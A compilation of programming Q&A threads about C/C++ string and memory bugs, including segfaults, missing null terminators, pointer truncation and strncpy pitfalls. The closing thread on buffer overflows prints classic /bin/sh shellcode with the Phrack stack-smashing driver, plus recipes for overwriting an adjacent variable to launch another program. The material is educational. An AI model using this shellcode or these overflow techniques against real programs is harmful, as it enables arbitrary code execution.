Linux Segmentation fault with std::string::iterator - c++

I keep getting unusual segmentation faults inside libc.so.6 on a CentOS 6.4 64bit machine. This is the backtrace that gdb most often reports:
0x00007ffff60d9b3f in memcpy () from /lib64/libc.so.6
(gdb) backtrace
#0 0x00007ffff60d9b3f in memcpy () from /lib64/libc.so.6
#1 0x00000000004b6a6b in std::string::_S_construct<__gnu_cxx::__normal_iterator<char*, std::string> > ()
#2 0x00000000004b719b in NewsMAIL::SMTPClient::receiveLine(std::basic_string<char, std::char_traits<char>, std::allocator<char> >*) ()
#3 0x00000000004b776f in NewsMAIL::SMTPClient::handleResponse() ()
And this is the code in question that seems to trigger the segfault:
bool SMTPClient::receiveLine(std::string* Line)
{
static std::string Buffer;
std::string::iterator iter;
while((iter = std::find(Buffer.begin(), Buffer.end(), '\n')) == Buffer.end()) {
char Bucket[MAX_BUCKET_SIZE + 1] = {};
int BytesRecv = read(m_Socket, Bucket, MAX_BUCKET_SIZE);
//Did we get a socket error?
if(BytesRecv == -1) {
//This is generally considered a bad thing..
*Line = Buffer;
Buffer = std::string("");
return false;
}
Bucket[BytesRecv] = 0;
Buffer += Bucket;
}
*Line = std::string(Buffer.begin(), iter);
Buffer = std::string(iter + 1, Buffer.end());
return true;
}
Sometimes it works without any failures, so unfortunately it does not happen every time.
The above code is a slightly modified version of this: https://stackoverflow.com/a/1584620/3133245
Does anyone have any thoughts on why this might be happening? I am compiling with g++ 4.7.2
Thanks!
Nate

Using a static variable (Buffer) is not thread safe. Could cause a crash.
You should add a check that Line is not NULL.
BTW, the line Buffer = std::string(""); could be Buffer.clear();
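A minimal sketch of how the line splitting could look without a static buffer, assuming the buffer becomes a per-connection member that is passed in by reference. The helper name extractLine and its signature are hypothetical and not part of the original code. It works with indices from std::string::find instead of iterators and checks Line for null:

```cpp
#include <cstddef>
#include <string>

// Hypothetical helper: moves one '\n'-terminated line out of `buffer`.
// Returns false and leaves both arguments untouched if `line` is null
// or if no complete line has been buffered yet.
bool extractLine(std::string& buffer, std::string* line) {
    if (line == nullptr) return false;
    const std::size_t pos = buffer.find('\n');
    if (pos == std::string::npos) return false;
    line->assign(buffer, 0, pos);  // text before the newline
    buffer.erase(0, pos + 1);      // drop the line and its newline
    return true;
}
```

The caller would keep reading from the socket and appending to its own buffer until extractLine returns true.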

In addition to the static variable issue, are you sure that the data that is received contains no embedded NUL characters?
If the received data contains embedded NUL bytes, this line will not do the correct concatenation using the += operator:
Buffer += Bucket;
The += overload assumes that Bucket is a C-style string, thus the first NUL byte encountered will be used as the terminator when the concatenation occurs.
Taking a glance at the code, it would seem that if Bucket does indeed contain embedded NUL characters, doing the above concatenation could result in your "iter" iterator pointing past the end() of Buffer (in those lines after the while() loop).
Instead, you can do this:
Buffer.append(Bucket, BytesRecv);
This guarantees that all characters that Bucket is addressing will be concatenated onto the existing string.
But before making any changes, make sure you know exactly what the issue is, especially since you stated the error doesn't happen very often. Changing around code without first knowing the true cause of the error may just mask the error, thus making it harder to diagnose the real issue.
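To see the difference between the two ways of appending, here is a small sketch. The function names are made up for illustration; only operator+= and std::string::append(const char*, size_t) come from the standard library:

```cpp
#include <cassert>
#include <cstddef>
#include <string>

// Appends via operator+=(const char*): copying stops at the first NUL byte.
std::string appendAsCString(std::string buffer, const char* bucket) {
    assert(bucket != nullptr);
    buffer += bucket;
    return buffer;
}

// Appends exactly `count` bytes, embedded NUL bytes included.
std::string appendWithLength(std::string buffer, const char* bucket,
                             std::size_t count) {
    assert(bucket != nullptr);
    buffer.append(bucket, count);
    return buffer;
}
```

With the five received bytes 'a', 'b', NUL, 'c', '\n', the first function adds only two characters, while the second adds all five, so the newline is actually found by the search.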

Related

Zero termination when casting a char array to string?

I have this simple piece of code which reverses a string:
#include <string>
string str = "abcd";
char *ch = new char[str.length()];
for (int i = 0, j = str.length() - 1; i < str.length(); i++, j--)
ch[j] = str[i];
str = string(ch);
cout << str;
This works fine; however, I was wondering whether the char array ch must be zero-terminated (perhaps it only works because by chance there happens to be a 0 at memory position ch + str.length()). Therefore I've written the following quick test:
string str = "abcd";
char *ch = new char[str.length()];
for (int i = 0, j = str.length() - 1; i < str.length(); i++, j--)
ch[j] = str[i];
// note: illegal memory access, just a quick test
ch[str.length()] = 'a';
str = string(ch);
cout << str;
In the above code it is ensured that ch is never zero-terminated. To my surprise the code still works OK, and I can't get my head around this. How can str = string(ch) result in "dbca" when there is 'a' at ch[str.length()]? I would expect either a memory error or "dbcaa" as a result.
It doesn't matter what you did before this line:
str = string(ch);
The reason is that the line above may allocate memory, and the memory manager may have used the memory directly following your ch buffer as allocated space. So the a character you wrote there previously has vanished. Or something else happened during the construction of str that assumed that the space you wrote to previously is available.
If you want to know for sure, use your debugger. The std::string constructor and implementation will tell you what exactly occurred (that is, if your program even gets this far since you did introduce undefined behavior before the line of code above).
It's called undefined behaviour. It could be there is a zero after the last address of ch so it could appear to work. But you're overwriting memory allocated from the memory manager which will corrupt it, so you will run into trouble in a bigger application.
The memory manager could reserve a few more bytes in debug builds for debugging purposes. Try a release build and see what happens.
Your code is totally broken, having undefined behaviour. Specifically...
ch[j] = ch[i];
...reads from ch[i] which is uninitialised memory - as bgoldst commented it's probably meant to be str[i], then - even if that didn't invalidate any expectations of program behaviour...
str = string(ch);
...attempts construction using a ch, which points to still uninitialised memory that could have any content at all, and will be scanned along until a NUL happens to be hit, some access violation crashes the program, or whatever other undefined behaviour manifests. If you fixed the loop to copy from str, then you'd probably want this to cope with the lack of NUL termination:
str = string(ch, str.length());
Perhaps the vaguely worthwhile question is "isn't it almost impossible that I'd have observed (the claimed) dbca output despite the above errors?". To that I'd say:
dbca is not dcba - which did you actually see?
garbage characters in memory might not do anything on your terminal, and it's quite possible that attempting to print from where ch was allocated printed nothing visible, or e.g. printed some crap then a clear-back-to-the-start-of-line, delete-previous, backspace etc. character code, then happened to hit the memory allocated by the std::string object (seemingly lacking a short-string-optimisation buffer), and therefore displayed its contents too.
So - it's not so statistically amazing to constitute evidence for your program somehow having defined behaviour....
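For reference, a sketch of the reversal that does not rely on a terminator at all, because it passes the length explicitly to the std::string constructor as suggested above. The function name reverseCopy is hypothetical, and a std::vector replaces the raw new[] so nothing leaks:

```cpp
#include <cstddef>
#include <string>
#include <vector>

// Reverses `str` through a temporary char array that has no NUL terminator.
std::string reverseCopy(const std::string& str) {
    const std::size_t n = str.length();
    if (n == 0) return std::string();
    std::vector<char> ch(n);  // exactly n chars, no room for a terminator
    for (std::size_t i = 0; i < n; ++i)
        ch[n - 1 - i] = str[i];
    // The (pointer, length) constructor never scans for a NUL byte.
    return std::string(ch.data(), n);
}
```

In real code, std::string(str.rbegin(), str.rend()) does the same job in one line.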

C/C++ Valid pointer but getting EXC_BAD_ACCESS and KERN_INVALID_ADDRESS

I've been racking my brain over this for hours and I can't find anything.
Potentially relevant information:
Running on OSX 10.10.1 Yosemite
This same code works perfectly fine on Windows.
Every time I run this, it breaks at the exact same spot.
The application is an OpenGL app that uses glfw3 to create a window.
There are no threads, it's just a single threaded app, so the pointer is not being overwritten or being deallocated.
These two methods are contained in two separate .c files that are compiled as c++ and contained within a built library that I link to. Other methods in the library work just fine.
OPchar* OPstreamReadLine(OPstream* stream) {
OPchar buffer[500];
i32 len, i;
// ALL WORKS FINE
// check to see if we are at the end of the stream or not
if(stream->_pointer >= stream->Length) return 0;
// Prints out the contents of the stream, and the start of the pointer just fine
OPlog("Buffer %s | Pointer %d", stream->Data, stream->_pointer);
sscanf((OPchar*)stream->Data + stream->_pointer, "%500[^\n]", buffer);
len = strlen(buffer);
stream->_pointer += len + 1;
// Spits out 'Read Hello of len 5'
OPlog("Read %s of len %d", buffer, len);
// ISSUE STARTS HERE
// OPchar is a typedef of char
// STEP 1. Make the call
OPchar* result = OPstringCreateCopy(buffer);
// STEP 6. The Pointer is printed out correctly, its the same thing
// ex: Pos: 0xd374b4
OPlog("Pos: 0x%x", result);
// STEP 7. This is where it breaks
// EXC_BAD_ACCESS and KERN_INVALID_ADDRESS
// What happened?
// Did returning the pointer from the function break it?
OPlog("len: %d", strlen(result));
OPlog("Result %s", result);
return result;
}
OPchar* OPstringCreateCopy(const OPchar* str) {
i32 len = strlen(str);
// STEP 2. Prints out 'Hello 5'
OPlog("%s %d", str, len);
// Allocates it (just uses malloc)
OPchar* result = (OPchar*)OPalloc(sizeof(OPchar) * (len + 1));
// Copies the previous string into the newly created one
strcpy(result, str);
// Ensures that it's null terminated
// even though strcpy is supposed to do it
result[len] = NULL;
// STEP 3. Gives a good pointer value
// ex: Pos: 0xd374b4
OPlog("Pos: 0x%x", result);
// STEP 4. Prints out '5'
OPlog("len: %d", strlen(result));
// STEP 5. Prints out 'Hello'
OPlog("hmmm: %s", result);
// Just return this same pointer
return result;
}
I've since replaced these functions with versions that don't use the sscanf stuff which got around the issue, however I'm now hitting the same problem with another returned pointer becoming invalid. This example was simpler to explain, so I thought I'd start there.
Here's a theory, which you can go test. Instead of using %x to print your pointers, use %p. You may be on a 64-bit OS without realizing it. The problem could be that you did not supply a prototype for OPstringCreateCopy, in which case the return value was treated as an int (32 bits) instead of a pointer (64 bits). Since you are only printing out 32 bits of result, it seems like the pointer is valid, but the upper 32 bits may have been lost.
The fix for this is to make sure you always supply prototypes for all your functions. There should be some compiler warnings that you can turn on to assist you with finding uses of unprototyped functions. You might also want to go through your code and check for any other 64-bit problems, such as if you ever cast a pointer to an int.
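A small sketch of the effect described in this theory. The address 0x100d374b4 is made up for illustration and both function names are hypothetical. The first function mimics a 64-bit pointer value squeezed through a 32-bit int, and the second prints a pointer with %p so that no bits are dropped from the output:

```cpp
#include <cstdint>
#include <cstdio>
#include <string>

// Simulates a 64-bit address passing through a 32-bit integer:
// the upper 32 bits are lost.
std::uint64_t truncateTo32Bits(std::uint64_t address) {
    return static_cast<std::uint32_t>(address);
}

// Formats a pointer with %p, which prints the full pointer width
// (the exact text is implementation-defined).
std::string formatPointer(const void* p) {
    char text[32];
    std::snprintf(text, sizeof text, "%p", p);
    return text;
}
```

For the made-up address 0x100d374b4, the truncated value is 0xd374b4, which looks like a plausible pointer when printed with %x but refers to a different location.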

Strange behavior with function strncpy?

In my project, I have run into a strange problem with strncpy. I have checked the reference, but the behavior of strncpy still confuses me.
The problem shows up in this function when it reaches strncpy(subs,target,term_len);
I don't know why there are two blanks after the string. It is a big project, so I cannot paste all the code here. The following is just a piece. All my code is here.
char* subs = new char[len];
while(top<=bottom){
char* term = m_strTermTable[bottom].strterm;
int term_len = strlen(term);
memset(subs,'\0',len);
strncpy(subs,target,term_len);
int subs_len = strlen(subs);
int re = strcmp(subs,term);
if (re == 0)
{
return term_len;
}
bottom--;
}
delete[] subs;
strncpy does not add a terminating null byte if the source string is at least as long as the maximum number of characters (i.e. in your case, that would be if strlen(target) >= term_len holds). If that happens, subs may or may not be null terminated correctly.
Try changing your strncpy call to
strncpy(subs, target, term_len-1);
so that even if strncpy doesn't add a terminating null byte, subs will still be null-terminated correctly due to the previous memset call.
Now, that being said - you could avoid using a separate subs buffer altogether (which leaks anyway in case the control flow gets to the return statement) by just using strncmp as in
while(top<=bottom) {
char* term = m_strTermTable[bottom].strterm;
int term_len = strlen(term);
if (strncmp(term, target, term_len) == 0) {
return term_len;
}
bottom--;
}
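If a truncated copy really is needed, one common pattern is to copy at most one character less than the destination size and write the terminator explicitly. This is a sketch only, and the helper name copyTruncated is hypothetical:

```cpp
#include <cassert>
#include <cstddef>
#include <cstring>

// Copies at most dst_size - 1 characters from src and always terminates dst.
void copyTruncated(char* dst, std::size_t dst_size, const char* src) {
    assert(dst != nullptr && src != nullptr);
    if (dst_size == 0) return;
    std::strncpy(dst, src, dst_size - 1);  // may leave dst unterminated...
    dst[dst_size - 1] = '\0';              // ...so terminate it explicitly
}
```

With a 4-byte destination and the source "abcdef", the result is "abc". With a shorter source, strncpy pads the rest of the copied range with null bytes.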

C++ std::string memory model

The following code (part of a request-response loop in a networked server) works most of the time, but sometimes fails, in that the client will report it has gotten some weird other string (seemingly random bytes from locations nearby in memory in this function, or null bytes).
string res = "";
if (something) {
res = "ok";
}
if (res.length() > 0) {
send_data((void*) res.c_str(), res.length());
}
In my mind, it would seem that both "" and "ok" are constant std::strings, and res is a pointer to either one of them, and as such the whole thing should work, but apparently that's not the case. Can someone please explain to me what happens here?
You probably forgot to send the null-terminator to denote the end of the string:
send_data((void*) res.c_str(), res.length()+1);
Your code is okay, I suppose there's some memory corruption in your program.
"" and "ok" are actually zero-terminated buffers of type 'const char *', not strings. When you assign them to your string all their data is copied inside string internal buffer, not including last char which is zero, so
res = "";
will clear internal string buffer, and res.length() will become 0.
res.c_str() will return the address of that buffer, not the address of "" or "ok" literals.
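To make the byte counts concrete, here is a sketch that collects the bytes a call like send_data(res.c_str(), n) would hand over. The function bytesToSend is hypothetical. It relies only on the guarantee that c_str() points at length() characters followed by one terminating zero:

```cpp
#include <cstddef>
#include <string>
#include <vector>

// Returns the bytes that would be transmitted for `res`,
// optionally including the terminating zero that c_str() provides.
std::vector<char> bytesToSend(const std::string& res, bool includeTerminator) {
    const std::size_t n = res.length() + (includeTerminator ? 1 : 0);
    const char* data = res.c_str();  // the string's own buffer, not the literal
    return std::vector<char>(data, data + n);
}
```

For "ok" this yields two bytes without the terminator and three with it. Whether the receiver expects the extra zero depends on the protocol.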

Can you give an example of a buffer overflow?

I've heard so much about buffer overflows and believe I understand the problem but I still don't see an example of say
char buffer[16];
//code that will over write that buffer and launch notepad.exe
"Smashing The Stack For Fun And Profit" is the best HowTo/FAQ on the subject.
See: http://insecure.org/stf/smashstack.html
Here is a snip of some actual shellcode:
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
First, you need a program that will launch other programs. A program that executes OS exec in some form or other. This is highly OS and language-specific.
Second, your program that launches other programs must read from some external source into a buffer.
Third, you must then examine the running program -- as laid out in memory by the compiler -- to see how the input buffer and the other variables used for step 1 (launching other programs) exist.
Fourth, you must concoct an input that will actually overrun the buffer and set the other variables.
So. Parts 1 and 2 are a program that looks something like this in C.
#include <someOSstuff>
char buffer[16];
char *program_to_run= "something.exe";
void main( char *args[] ) {
gets( buffer );
exec( program_to_run );
}
Part 3 requires some analysis of what the buffer and the program_to_run look like, but you'll find that it's probably just
\x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 s o m e t h i n g . e x e \x00
Part 4, your input, then has to be
1234567890123456notepad.exe\x00
So it will fill buffer and write over program_to_run.
There are two separate things:
The code that overflows a buffer, this is easy to do and will most likely end with a segmentation fault. Which is what has been shown: sprintf(buffer,"01234567890123456789");
The means of placing code in the overwritten memory so that it actually gets executed. This is harder than merely overflowing a buffer, and is related to how programs are executed. When a function returns, the program usually takes the address of the next instruction to execute from the stack. If you manage to overwrite that value with a valid address without causing any other kind of corruption, you can create an exploit. It is usually done by making that value point to a section of memory which contains your code. This is why marking sections of memory as non-executable can help against these kinds of exploits.
Well, I don't know how to launch notepad.exe, but to overwrite this buffer simply do:
sprintf(buffer, "somestringlongerthan16");
int x[10];
x[11] = 1;
gets(buffer);
There is no way to use gets properly, as it doesn't ask for the size of the buffer.
scanf("%s", buffer);
scanf will read string input until it hits whitespace. If the user types 16 or more characters, there will be a buffer overflow, because no room is left for the terminating NUL.
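For contrast, a sketch of the bounded form: a field width in the format string caps how many characters are stored. It uses sscanf on an in-memory string rather than scanf on stdin so that it is easy to try out, and the function name readToken is hypothetical:

```cpp
#include <cassert>
#include <cstdio>
#include <string>

// Parses one whitespace-delimited token into a 16-byte buffer.
// The width 15 leaves room for the terminating NUL.
std::string readToken(const char* input) {
    assert(input != nullptr);
    char buffer[16];
    if (std::sscanf(input, "%15s", buffer) != 1) return std::string();
    return buffer;
}
```

A longer token is cut off after 15 characters instead of running past the end of the buffer. For whole lines, fgets with the buffer size plays the same role as a replacement for gets.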
The way a buffer overflow can be used to make code do something other than intended, is by writing data outside the allocated buffer overwriting something else.
The overwritten data would typically be the code in another function, but a simple example is overwriting a variable next to the buffer:
char buffer[16];
string myapp = "appmine.exe";
void execMe(string s) {
for (int i = 0; i < s.Length; i++) buffer[i] = s[i];
Sys.Execute(myapp, buffer);
}
If you call the function with more data than the buffer can hold, it would overwrite the file name:
execMe("0123456789012345notepad");
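The missing piece in the example above is a length check before the copy. A minimal sketch of such a check in C++, where the function name copyIntoBuffer is hypothetical and the 16-byte size is taken from the example:

```cpp
#include <cstddef>
#include <cstring>
#include <string>

// Copies `s` into the fixed buffer only if it fits together with its
// terminating NUL. Returns false and leaves the buffer untouched otherwise.
bool copyIntoBuffer(char (&buffer)[16], const std::string& s) {
    if (s.size() >= sizeof buffer) return false;  // would overflow
    std::memcpy(buffer, s.c_str(), s.size() + 1); // includes the NUL
    return true;
}
```

With this check, the call using "0123456789012345notepad" is rejected instead of overwriting whatever happens to be stored after the buffer.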
Phrack's Smashing The Stack For Fun And Profit has enough explanation to enable you to do what you're asking.
For a simple example see also here:
Protecting Against Some Buffer-Overrun Attacks: An Example Attack
http://www.greenend.org.uk/rjk/random-stack.html